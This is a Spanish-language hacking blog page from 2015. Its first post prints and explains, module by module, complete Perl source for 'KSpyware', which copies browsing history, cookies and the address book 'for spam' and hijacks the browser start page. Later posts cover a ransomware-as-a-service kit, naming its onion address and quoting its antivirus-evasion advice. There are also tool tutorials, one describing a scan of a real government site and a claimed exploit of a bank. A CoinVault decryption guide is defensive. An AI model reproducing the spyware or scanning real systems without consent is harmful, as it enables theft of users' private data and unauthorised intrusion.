HACKER ANGELWHITE GALC

jueves, 26 de noviembre de 2015

Codigo Fuente del Virus spyware



 



Código:

############################################
### KSpyware v0.1 for educational purpose ###############
############################################

use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;

############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################

sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";

opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";

print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}


#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################

sub indexsites {
my $name;
$name=Win32::LoginName();

$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

}

########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################

sub mails {
my $name;
$name=Win32::LoginName();

$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);

}

#####################################
### Hijack IE by modifying the main page ##########
#####################################

sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};

$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}

#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################

sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}

###################
### Entry point !!! #######
###################

$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";

programfiles();
indexsites();
mails();
mainpage();
pub();

exit 0;


Ahora les explicare para que sirve cada modulo de este codigo en perl.

Con este codigo obtendremos una lista de programas instalados en el sistema.

Código:

############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################

sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";

opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";

print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}


Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.

Código:

#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################

sub indexsites {
my $name;
$name=Win32::LoginName();

$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

}


Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...

Código:

########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################

sub mails {
my $name;
$name=Win32::LoginName();

$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);

}


Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.

Código:

#####################################
### Hijack IE by modifying the main page ##########
#####################################

sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};

$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}


Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.

Código:

#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################

sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}


Y con este el entry point...

Código:

###################
### Entry point !!! #######
###################

$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";

programfiles();
indexsites();
mails();
mainpage();
pub();

exit 0;

.perl

Tox, cómo crear tu propio ransomware en 3 pasos

McAfee descubrió en la Deep Web unos kits de construcción de ransomware que permiten fácilmente construir el malware en sólo 3 pasos, implementando un interesante modelo de negocio.
Página en la Deep Web
En el submundo del crimen es fácil encontrar kits de construcción de malware que permiten fácilmente construir códigos maliciosos a partir de plantillas existentes y en los mismos casos a partir de aplicaciones legítimas. Una nueva tendencia surgió de investigación por expertos de McAfee es una especie de constructor de ransomware fácil de usar, esta familia de malware es cada vez más popular en el ecosistema criminal y los ladrones están tratando de capturar esta oportunidad.
El kit de construcción de ransomware, apodado Tox, está disponible en línea de forma gratuita en la web oscura desde el 19 de mayo. La dirección .onion de la página web que ofrecen es:

toxicola7qwv37qj.onion
"Hemos desarrollado un virus que, una vez abierto en un sistema operativo Windows, encripta todos los archivos. Una vez finalizado este proceso, se muestra un mensaje preguntando a pagar un rescate a una dirección bitcoin para desbloquear los archivos. "
Establece la presentación de Tox disponible en la página principal.

Un usuario interesado en Tox puede suscribirse al servicio de crear su propio virus. Los autores explican que es muy fácil crear un ransomware en unos sencillos pasos:

  • Decida la cantidad de rescate.
  • Escriba su "causa".
  • Escriba el captcha

Los creadores de Tox solicitan un porcentaje del importe pagado como rescate por las víctimas, garantizan el anonimato de los pagos y de transferencia de malware a través de la red Bitcoin y Tor. Los autores de Tox garantizan que la tasa de detección para los virus generados por la plataforma es muy baja.

Pasos a seguir para la creación del virus
"Una vez que haya descargado el virus, lo que tiene que infectar a las personas (sí, puedes enviar spam del mismo virus a más personas). ¿Cómo? Esa es tu parte. La práctica más común es de spam como un archivo adjunto de correo electrónico. Si decides seguir este método, asegúrate de comprimir el archivo para evitar los antivirus y detectores antispam. "Se informa en el sitio web oficial.
"La parte más importante: el bitcoin pagado por la víctima será acreditado a tu cuenta. No hacemos más que mantener una cuota de 30% de los ingresos, por lo que si se especifica $100 de rescate, recibirás $70 y nosotros vamos a conseguir $30, es justo, ¿no? "

La característica clave de Tox son:

Tox es gratuito. Sólo tienes que registrarte en el sitio.
Tox depende de Tor y Bitcoin. Eso permite un cierto grado de anonimato.
El malware funciona como se anuncia.

De entrada, el nivel de evasión antimalware es bastante alto, es decir, los objetivos necesitarían controles adicionales activos (HIPS, lista de acceso, sandbox) para capturar o impedir la infección. La detección antimalware es bastante baja, es decir, los objetivos del malware necesitarían controles establecidos adicionales (HIPS, listas de acceso, sandboxing) para atrapar o evitar esto.

El modelo de la delincuencia-como-servicio implementado por el autor de Tox es tan simple como efectivo, el constructor de malware genera un ejecutable de alrededor de 2 MB que se disfraza como un archivo .scr.

Los suscriptores de Tox pueden distribuirlo como prefieren, mientras que el servicio oculto Tox hará un seguimiento de cualquier instalación y el beneficio correspondiente. Los clientes de Tox recibirán sus fondos directamente en la dirección Bitcoin que proporcionaron durante la fase de suscripción.

El virus Tox descarga primero los componentes esenciales para trabajar, Curl y el cliente TOR.

Los expertos destacaron que muchos otros actores de amenazas adopten este modelo de venta, también esperan que los autores de malware mejorarán las capacidades de evasión de sus agentes maliciosos y utilizarán cifrado para proteger el tráfico de malware.

martes, 17 de noviembre de 2015

Cómo Eliminar el Ransomware CoinVault y Recuperar tus Archivos

En la mayoría de los casos, si un ransomware logra infectar tu máquina, no hay mucho que puedas hacer. Por suerte, de vez en cuando la policía y las compañías de seguridad cibernética logran neutralizar los servidores de comando y control de ciertos ransomwares y recuperan información de ellos. Esta información es muy útil, ya que ayuda a crear herramientas de descifrado que permiten recuperar archivos de los usuarios que fueron bloqueados por estos malwares. Recientemente, la ciber-policía holandesa y Kaspersky Lab crearon una de estas soluciones para las víctimas del ransomware CoinVault.







Si quieres saber más acerca de CoinVault, puedes leer este reporte detallado de Securelist. Si estás interesando en saber cómo Kaspersky creó la solución que descifrar los códigos criptográficos que bloqueaban los archivos, chequea este artículo. Ahora bien, si quieres saber cómo puedes deshacerte de este ransomware y recuperar tus archivos, continúa leyendo:
Paso 1: comprueba si estás infectado con CoinVault
Primero debes asegurarte de que tus archivos fueron bloqueados por CoinVault y no por otro ransomware. Esto es bastante fácil de determinar: si CoinVault infectó tu sistema, ésta será la imagen que aparece en tu pantalla:

convault-decryption-1 


Paso 2: consigue la dirección de la billetera Bitcoin
En la parte de abajo a la derecha de la ventana de CoinVault verás la dirección de la billetera Bitcoin de este ransomware (está marcada con una elipse negra en la imagen de arriba). Es muy importante que copies y guardes esta dirección.

Paso 3: Consigue la lista de archivos encriptados
En la parte superior izquierda de la ventana verás un botón que dice: “View encrypted filelist” -ver la lista de archivos encriptados- (está marcado con una elipse azul en la imagen de arriba). Clickea en este botón y graba la lista en un archivo aparte.

Paso 4: Elimina el ransomware CoinVault
Ingresa en https://kas.pr/kismd-cvault y descarga la versión de prueba de Kaspersky Internet Security. Instálala y elimina CoinVault de tu sistema. Antes de hacer esto, asegúrate de que has cumplido con los pasos 2 y 3.

Paso 5: Ingresa en https://noransom.kaspersky.com
En esta dirección deberás ingresar la dirección Bitcoin que obtuviste en el paso 2. Si tu dirección Bitcoin es conocida, la IV y la clave aparecerán en la pantalla. Es posible que aparezcan muchas IVs y claves. En este caso, guárdalas todas.

coinvault-decryption-2 


Paso 6: descarga la herramienta de descifrado
Descarga la herramienta desde aquí: https://noransom.kaspersky.com y ejecútala en tu PC. Si te aparece un mensaje de error como el que se muestra aquí, ve al paso 7. Si no te aparece nada, omite el paso 7 y continúa con el paso 8.


coinvault-decryption-3 


Paso 7: Descarga e instala las bibliotecas adicionales
Ingresa en http://www.microsoft.com/en-us/download/details.aspx?id=40779 y sigue las instrucciones que aparecen en el sitio web. Luego, instala el software.


Paso 8: ejecuta la herramienta de descifrado
Cuando inicies la herramienta, verás la pantalla que se muestra a continuación:


coinvault-decryption-4 

Paso 9: comprueba si el descifrado funciona correctamente
Cuando ejecutes el programa por primera vez, recomendamos que chequees el funcionamiento del descifrado. Para esto, haz lo siguiente:
  • Clickea en el botón “Select File”, ubicado en la casilla “Single File Decryption” y luego selección cualquiera de los archivos que quieras descifrar.
  • Ingresa la IV de que obtuviste en la página web
  • Ingresa la clave que obtuviste de la página web
  • Haz click en el botón “Start” para comenzar.
Verifica si el archivo fue descifrado correctamente.






Paso 10: Descifra todos los archivos bloqueados por CoinVault.


Si todo salió bien en el paso 9, podrás recuperar todos tus archivos a la vez. Para hacer esto, selecciona la lista de archivos encriptados que guardaste en el paso 3, ingresa tu IV y tu clave e inicia el proceso de descifrado. Podrás elegir la opción “Overwrite encrypted file with decrypted contents” para sobreescribir los archivos bloqueados.
Si obtuviste muchas IVs y claves cuando ingresaste la dirección de la billetera Bitcoin, por favor ten mucho cuidado. Al momento, no estamos 100% seguros de dónde provienen las IVs y claves múltiples. En este caso recomendamos no tildar la casilla de “Overwrite encrypted file with decrypted contents”. Si algo saliera mal con el descrifrado, podrás utilizar otra IV+clave hasta lograr completar el descifrado.
Si no recibiste ninguna IV y/o clave, deberás esperar y chequear el sitio https://noransom.kaspersky.com regularmente, dado que la investigación todavía se encuentra en marcha. Todas las claves e IVs faltantes se irán agregando a medida que estén disponibles.


lunes, 16 de noviembre de 2015

Arachni - Web Application Security Scanner Framework Kali Linux 2.0



Saludos mis fieles lectores en esta oportunidad, les traigo Arachni  es una escanner de vulnerabilidades web ya algo  conocido desde hace años, pero hasta el dia de hoy es de gran ayuda para las investigaciones de vulnerabilidades a nivel mundial, ya que hasta la actualidad mantiene una actualización en sus repertorios frecuentemente, con la cual en este articulo vamos a interactuar con sus interfaces en la terminal  y en plataforma web.

Caracteristicas:

General

  • Cookies-jar / soporte para cookies.
  • Apoyo encabezado personalizado.
  • Soporte SSL con opciones de grano fino.
  • Agente de usuario spoofing.
  • El soporte de proxy de SOCKS4, SOCKS4A, SOCKS5, HTTP / 1.1 y HTTP / 1.0.
  • Autentificación Proxy.
  • Autenticación del sitio (basado en SSL, basada en formularios, Cookie Jar, Basic-Digest, NTLMv1, Kerberos y otros).
  • Detección automática de registro de salida y re-inicio de sesión durante la exploración (cuando el inicio de sesión inicial se realizó a través del inicio de sesión automático, login_script o plugins del proxy).
  • Página 404 personalizada detección.
  • IU abstracción:
  • Interfaz de línea de comandos.
  • Interfaz Web del usuario.
  • Pausa funcionalidad / reanudar.
  • Apoyo hibernación - Suspender a y restaurar desde el disco.
  • Peticiones HTTP asíncrona de alto rendimiento.


Navegación spider Html5 Javascript DOM, AJAX

Arachni incluye un entorno de navegador integrado, de bienes con el fin de proporcionar una cobertura suficiente para las aplicaciones web modernas que hacen uso de tecnologías como HTML5, JavaScript, manipulación DOM, AJAX, etc.
La información pertinente incluye:


  • Página DOM, como código HTML.
  • Con una lista de transiciones DOM requeridas para restaurar el estado de la página a la que en el momento en que se registra.
  • DOM original (es decir, antes de la acción que causó la página para iniciar sesión), como código HTML.
  • Con una lista de transiciones DOM.
  • Sumideros de flujo de datos - Cada fregadero es un método de JS que recibió un argumento viciado.
  • Objeto principal del método (ej .: DOMWindow).
  • Firma del método (ej .: decodeURIComponent ()).
  • Lista de argumentos.
  • Con la mancha identificada situado recurrentemente en los objetos incluidos.
  • Método de código fuente.
  • Stacktrace JS.
  • Flujo de ejecución se hunde - Cada fregadero es una carga útil JS ejecutado con éxito, ya que se inyecta por los controles de seguridad.
  • Incluye un stacktrace JS.
  • JavaScript pila-rastros incluyen:
  • Nombres de los métodos.
  • Ubicaciones método.
  • Códigos fuente Método.
  • Las listas de argumentos.

Browser-cluster

El clúster navegador es lo que coordina el análisis de navegador de los recursos y permite que el sistema para realizar operaciones que normalmente serían bastante tiempo de una forma de alto rendimiento.

Las opciones de configuración incluyen:


Mediante la inspección de todas las páginas posibles y sus estados (cuando se utiliza código de cliente) Arachni es capaz de extraer y auditar los siguientes elementos y sus entradas:


Junto con los que requieren la interacción con un navegador real debido a eventos DOM.
Campo de golf
Junto con los que tienen parámetros del lado del cliente en su fragmento, es decir:

  • LinkTemplates - lo que permite la extracción de insumos arbitrarias de caminos genéricos, basados ​​en las plantillas suministradas por el usuario - útil cuando las reglas de reescritura no están disponibles.
  • Junto con los que tienen parámetros del lado del cliente en sus fragmentos de URL, es decir: http://example.com/#/param/val/param2/val2
  • Galletas
  • Encabezados
  • Elementos del lado del cliente genéricos como entradas que se han asociado eventos DOM.
  • Parámetros AJAX-petición.
  • Solicitar datos JSON.
  • Datos de la solicitud XML.
  • Arquitectura distribuida abierta

En la actualidad, las siguientes plataformas se pueden identificar:


Sistemas operativos
  • BSD
  • Linux
  • Unix
  • Ventanas
  • Solaris
  • Servidores Web
  • apache
  • IIS
  • Nginx
  • Gato
  • Embarcadero
  • Lenguajes de programación
  • PHP
  • ÁSPID
  • ASPX
  • JSP
  • Pitón
  • Rubí
  • Marcos
  • Estante

El usuario también tiene la opción de especificar plataformas adicionales (como un servidor de base de datos) con el fin de ayudar al sistema sea lo más eficiente posible. Alternativamente, la huella dactilar se puede desactivar por completo.

Por último, Arachni siempre errar por el lado de la precaución y enviar todas las cargas útiles disponibles cuando no identifica plataformas específicas.

Activo


  • Inyección SQL (sql_injection) - basado en la detección de errores.
  • Oráculo
  • InterBase
  • PostgreSQL
  • MySQL
  • MSSQL
  • EMC
  • SQLite
  • DB2
  • Informix
  • Firebird
  • SAP DB Max
  • Sybase
  • Frontbase
  • Ingres
  • HSQLDB
  • MS Access
  • Ciego de inyección SQL utilizando el análisis diferencial (sql_injection_differential).
  • Ataques de temporización de inyección SQL utilizando Ciegos (sql_injection_timing).
  • MySQL
  • PostgreSQL
  • MSSQL
  • NoSQL inyección (no_sql_injection) - detección de la vulnerabilidad basada error.
  • MongoDB
  • Inyección utilizando el análisis de Ciegos NoSQL diferencial (no_sql_injection_differential).
  • Detección CSRF (CSRF).
  • Inyección de código (code_injection).
  • PHP
  • Rubí
  • Pitón
  • JSP
  • ASP.NET
  • Ataques de temporización de inyección de código utilizando Ciegos (code_injection_timing).
  • PHP
  • Rubí
  • Pitón
  • JSP
  • ASP.NET
  • Inyección LDAP (ldap_injection).
  • Recorrido Path (path_traversal).
  • *nada
  • Ventanas
  • Gato
  • La inclusión de archivos (file_inclusion).
  • *nada
  • Ventanas
  • Gato
  • PHP
  • Perl
  • División de Respuesta (response_splitting).
  • Inyección de comandos OS (os_cmd_injection).
  • *nada
  • * BSD
  • IBM AIX
  • Ventanas
  • Ciegos inyección de comandos OS utilizando ataques de temporización (os_cmd_injection_timing).
  • Linux
  • * BSD
  • Solaris
  • Ventanas
  • Inclusión de archivo remoto (RFI).
  • Redirecciones no validadas (unvalidated_redirect).
  • Redirecciones DOM no validadas (unvalidated_redirect_dom).
  • XPath inyección (xpath_injection).
  • Genérico
  • PHP
  • Java
  • dotNET
  • libXML2
  • XSS (XSS).
  • Sendero XSS (xss_path).
  • XSS en caso de atributos de elementos HTML (xss_event).
  • XSS en etiquetas HTML (xss_tag).
  • XSS en el contexto de la escritura (xss_script_context).
  • DOM XSS (xss_dom).
  • Insumos DOM XSS (xss_dom_inputs).
  • Contexto guión DOM XSS (xss_dom_script_context).
  • El código fuente de divulgación (source_code_disclosure)
  • XML entidad externa (xxe).
  • Linux
  • * BSD
  • Solaris
  • Windows

Pasivo


  • Métodos HTTP permitidos (allowed_methods).
  • Archivos de respaldo (backup_files).
  • Directorios de copia de seguridad (backup_directories)
  • Directorios comunes (common_directories).
  • Archivos comunes (common_files).
  • PUT HTTP (http_put).
  • La insuficiente protección de la capa de transporte para las formas de contraseña (unencrypted_password_form).
  • Detección de WebDAV (WebDAV).
  • Detección de HTTP TRACE (xst).
  • Número de tarjeta de crédito de la divulgación (credit_card).
  • Usuario divulgación CVS / SVN (cvs_svn_users).
  • Privado divulgación dirección IP (private_ip).
  • Puertas traseras (backdoors comunes).
  • mala configuración LÍMITE .htaccess (htaccess_limit).
  • Respuestas interesantes (interesting_responses).
  • Grepper objeto HTML (html_objects).
  • Dirección de divulgación (emails) E-mail.
  • Número de Seguro Social de los EE.UU. divulgación (SSN).
  • Lista de directorios contundente (directory_listing).
  • Mezcla de Recursos / Scripting (mixed_resource).
  • Galletas inseguros (insecure_cookies).
  • HttpOnly galletas (http_only_cookies).
  • La función de autocompletar para los campos de formulario de contraseña (password_autocomplete).
  • Origen de la parodia de acceso Restricción Bypass (origin_spoof_access_restriction_bypass)
  • Carga basada en formularios (form_upload)
  • localstart.asp (localstart_asp)
  • Conjunto de la galleta por un dominio principal (cookie_set_for_parent_domain)
  • Missing cabeceras-Transporte-seguridad estrictas para los sitios HTTPS (HSTS).
  • Missing X-Frame-Options encabezados (x_frame_options).
  • Política CORS Inseguro (insecure_cors_policy).
  • Política entre dominios Inseguro (allow-access-from) (insecure_cross_domain_policy_access)
  • Política entre dominios Inseguro (permitir-http-request-headers-from) (insecure_cross_domain_policy_headers)
  • Política de cliente de acceso Inseguro (insecure_client_access_policy)
  • Reporteros

  • HTML (zip)
  • Texto
  • JSON
  • XML
  • YAML.

Aceptación de arachi y sus capacidades según su fuente


Puntuaciones de detección de vulnerabilidades representan la capacidad de un escáner para detectar diferentes tipos y permutaciones de vulnerabilidades, así como la exactitud de los resultados cuando se trata de trampas que comúnmente causan falsos positivos.

Detección y precisión las puntuaciones de vulnerabilidad se pueden encontrar en:

http://sectoolmarket.com/web-application-scanners/57.html

Puntajes Arachni:

  • SQL inyección: 100% (0% de falsos positivos)
  • XSS Reflejado: 90,91% (0% de falsos positivos) - Misses casos que requieren soporte para el lenguaje VBScript ahora obsoleto.
  • Inclusión de archivo local: 100% (0% de falsos positivos)
  • Inclusión de archivo remoto: 100% (0% de falsos positivos)
  • Redirección no validado: 100% (0% de falsos positivos)
  • Archivos de copia de seguridad: 100% (0% de falsos positivos)


La interfaz de usuario de la web permite que varios usuarios realizar y gestionar múltiples exploraciones y luego colaborar en esas exploraciones y las cuestiones que han iniciado sesión. También hace que el manejo y el aprovechamiento de la naturaleza distribuida de Arachni muy fácil, lo que le permite correr la carga de trabajo de muchas exploraciones a través de un charco de despachadores.

Estos resultados se derivan del hecho de que Arachni aprende de comportamiento de la aplicación web y de forma inteligente se adapta a cada recurso de aplicación web, que lleva a una gran cobertura y precisión la vulnerabilidad - entre otras cosas.

referencia:
http://www.arachni-scanner.com/features/framework#Checks

Descarga:

http://www.arachni-scanner.com/download/

Al momento que descarguen el paquete de instalación acuérdense de escoger el que sea adaptable para su arquitectura en mi caso eligiere el mio que es de 64 bits

La descargare por la terminal:

root@kali:~# wget https://github.com/Arachni/arachni/releases/download/v1.3.2/arachni-1.3.2-0.5.9-linux-x86_64.tar.gz

Una ves ya cargado completamente la descarga lo que haremos sera extraerlo.

root@kali:~# tar -zxvf arachni-1.3.2-0.5.9-linux-x86_64.tar.gz

 ahora lo que haremos sera entrar a la carpeta extraída y entrar al modulo "bin" para ejecutar la interface web que sera nuestra primera plataforma de prueba en Arachni.

root@kali:~# cd arachni-1.3.2-0.5.9
root@kali:~/arachni-1.3.2-0.5.9# cd bin
root@kali:~/arachni-1.3.2-0.5.9/bin# ./arachni_web
Como podemos observar ya iniciamos nuestra servidor local con la plataforma de Arachni, en la parte de abajo vemos una lista del protocolo tcp en este caso es el link de nuestra plataforma en el localhost

* Listening on tcp://localhost:9292


Usted se preguntara ¿cual sera las credenciales de usuario?, las credenciales lo encontramos en el directorio principal de la carpeta en el archivo "README",pero haré una prueba para los que no entiendan, entraremos a la carpeta mencionada y ejecutar el archivo.

root@kali:~# cd arachni-1.3.2-0.5.9
root@kali:~/arachni-1.3.2-0.5.9# ls
root@kali:~/arachni-1.3.2-0.5.9# nano README


Cuando hallamos abierto el archivo con nano del README, deben bajar hasta encontrar la linea de dichas credenciales, de igual manera pueden abrirlo con leafpad

Entrar nuevamente a la plataforma y añaden las credenciales administrativas:



Interactuando con la plataforma 

Ahora que ya tenemos todo en orden, lo que haremos vamos a dirigirnos a la sesión "Scans" para establecer nuestra URL con la cual vamos auditar como lo vemos en la siguiente imagen:

Una ves establecido el url que vamos auditar, le daremos en GO! para iniciar la auditoria, entonces el escaner empezara a auditar la plataforma, en su proceso en vivo puede mostrar los resultados de las fallas encontradas, en mi caso fue muy sencilla encontrar y explotar un Banco.

Ya terminamos con la inteface web, ahora vamos a dirigirnos en la sección por la terminal, cabe aclarar que pueden ejecutarlo en la misma carpeta o por la terminal en cualquier modulo, ya que kali linux tiene instalado esta herramienta, pero su versión web tiene errores, es por eso que descargue el complemento web para ejecutarlo sin problemas : )

root@kali:~# arachni http://www.peru.gob.pe/

La imagen que acabo de mostrar solo es el 3% de la auditoria que esta llevando acabo, si desea usted puede ver los resultados en su totalidad cuando lo ejecute sin mas que decir un saludo especial!

domingo, 15 de noviembre de 2015

Conectarse y trabajar en un FTP mediante la terminal

Para subir, bajar o administrar el contenido de un FTP tenemos un sin fin de aplicaciones gráficas, Filezilla es de las más populares. Pero, ¿cómo hacer esto desde la línea de comandos?
Sobre todo cuando trabajamos en un servidor y no tenemos GUI, necesitamos subir algún archivo a un FTP o simplemente borrar algo, crear una carpeta, etc, hacer cualquier cosa y solo contamos con nuestra terminal, nada más.
Para trabajar con un servidor FTP nos basta un solo comando:
 abrimos nuestra terminal

ftp

Ponemos el comando ftp y seguido de él la dirección IP (o host) del servidor FTP al que deseamos conectarnos y listo, por ejemplo:

ftp 192.168.128.2

Como se muestra en la imagen más abajo, nos solicitará el usuario, lo escribimos y presionamos Enter, seguidamente nos pedirá el password, lo escribimos y presionamos Enter, listo ya entramos!
ftp-usuario-login
Ahora es donde escribimos los comandos en esta nueva shell que es la shell de ftp, por ejemplo para listar usamos el comando ls

ls

Aquí un screenshot:
ftp-ls
Hay muchos más comandos, por ejemplo:
  • mkdir : Crear carpetas
  • chmod : Cambiar permisos
  • del : Borrar archivos
¿se parecen a los de Linux no? … jeje, si escriben help en la shell del FTP les salen comandos que pueden usar:
ftp-help
La cuestión (y que algunos se preguntan) imagino sea … ¿cómo subir un archivo no?
Para subir un archivo el comando es send
La sintaxis es:

send archivo-local archivo-final

Por ejemplo, supongamos que tengo en mi Home un archivo llamado video.mp4 y deseamos subirlo a una carpeta llamada videos, el comando sería:

send video.mp4 videos/video.mp4

Siempre deben especificar el nombre del vídeo final, no importa si es el mismo o si no desean que cambien, deben especificarlo igual, es obligatorio.
Así de simple, el log/output que nos devuelve es similar a este:
local: video.mp4 remote: videos/videdo.mp4
200 PORT command successful.
150 Opening BINARY mode data connection for test.
226 Transfer complete. 0 bytes transferred. 0.00 KB/sec.
Como siempre les digo, si desean conocer muchas más opciones basta con leerse el manual del comando:

man ftp

O bien leerse el manual en algún sitio de internet.
Bueno eso, no pretendo que esto sea un super manual ni mucho menos … es para sentar las bases solamente 😉
Aún así, espero le haya sido de utilidad a algunos.
Saludos

domingo, 8 de noviembre de 2015

Extraccion de Metadatos con Exiftool




Esta Herramienta de codigo abierto, nos permite extraer varios archivos en diferentes extensiones para poder extraer los conocidos "Metadatos".

¿ pero que son los metadatos ?

Los Metadatos son datos de datos que se filtran automaticamente desde un ordenador o aparato inteligente en nuestros archivos de creacion, para ser mas claro dare un pequeño ejemplo por ejemplo, yo me eh encontrado un USB con fotos de personas en una empresa, y yo quisiera saber como y donde y como se han tomado esas fotos y en que camara inteligente se ha hecho ,  Gran pregunta ?, entonces aqui es donde viene la Herramienta " Exiftool " que llega Instalada en el Backtrack 5 R3 , vamos a la accion pondremos lo siguiente en nuestra Terminal

[code]cd /pentest/misc/exiftool[/code]

La Foto la Tengo en la Carpeta  "root"  con el nombre "foto.jpg" ahora pondremos lo siguiente para poder dar analisis al archivo :

[code]./exiftool -a /root/foto.jpg[/code]


























































Como vemos en este Analisis  la informacion es muy clasificada del aparato  que ha tomado la FOTO

Cambien me llamo la atención escontrar un archivo en Word, donde justamente encontre nombres de una lista de trabajadores , Justamente en esa empresa trabajo un familiar mio , el dicho documento tenia nombres de todos los trabajadores hecho oficialmente por el Ministerio de trabajo.

 pero algo andaba mal en todo ello , y supuesta mente ese documento era para un bono de dinero dado por el estado a dichos trabajadores.

el documento fue mostrado en una exposición hecha por tal empresa , justo quise buscar el nombre de mi familiar y no lo encontraba ?  al igual que a muchos  conocidos mios entonces me puse a pensar y a pensar durante minutos , y se me ocurrió la idea de ver el archivo profundamente,entonces me acorde que esta herramienta Exiftool tenia varios tipos de extensiones compatibles para Analizar, entonces analice el documento


























el archivo había sido modificado el día  12 de noviembre de este año, algo extraño fue que el documento fue enviado a dicha empresa, el 7   de noviembre, y porque una empresa tendría que modificar datos ya hechos y establecidos por el estado ???

Yo no quiero seguir en el tema ya que  siempre habrán empresas que no saben respetar el suelto de sus trabajadores entre otras cosas.

Nuevamente me despido hasta la próxima

El conocido ProxyChains / la cadena de Proxys simultaneas



Saludos mis queridos lectores en esta oportunidad vamos a tocar la herramienta de anonimato de conexiones simultaneas llamada "ProxyChains",este es un software de código abierto para sistemas GNU / Linux.

Proxychains 

Es una herramienta que obliga a cualquier conexión TCP hecha por cualquier aplicación dada
para seguir a través de proxy como términos de referencia o cualquier otro SOCKS4, SOCKS5 o HTTP (S) proxy.Auth-tipos soportados: "user / pass" para SOCKS4 / 5, "básico" para HTTP.

el  proxyresolv - DNS resolver  Se utiliza para resolver nombres de host a través de proxy o TOR
podemos ver como funciona el proxychains conectándose a varios proxys como una cadena que va ir pasando de un nodo a otro para NO dejar una pista real si un proxy nos deja nuestra cabecera de IP,mejorando el anonimato de manera mas útil.






























Descargar e instalar en linux.

En mi caso en kali llega instalado, pero pueden utilizar este repositorio en cualquier distro de GNU y disfrutar de esta gran herramienta, lo haremos sera configurar las sentencias de red abrimos la terminal :

sudo nano /etc/proxychains.conf


Buscaremos la linea  
--------------------------------------------------------------------------------------------------------------------------
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

--------------------------------------------------------------------------------------------------------------------------
añadiremos el puerto del nuestro navegador TOR : 
--------------------------------------------------------------------------------------------------------------------------
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9150
--------------------------------------------------------------------------------------------------------------------------

Una ves configurado y guardado abriremos el Tor Browser, para los que no han instalado el TOR dejo un articulo donde enseño como hacerlo .

http://backtrack-omar.blogspot.pe/2015/09/instalar-tor-browser-en-kali-linux-20-y.html

Verificamos nuestro Puerto y en mi caso utilizare el ProxyChains con mi herramienta privada

Cyberscan Web Security Scanner Modules


Configuracion y testeo exitoso no olviden compartir el blog,Saludos

Method Ninja of Google Hacking




Saludos antes de comenzar a redactar, deseo mandar saludos a un buen hermano con el seudónimo "Eduardo Desdes" la cual me a demostrado métodos nuevos de utilizar las Dorks de manera mas profesional e intelectual.

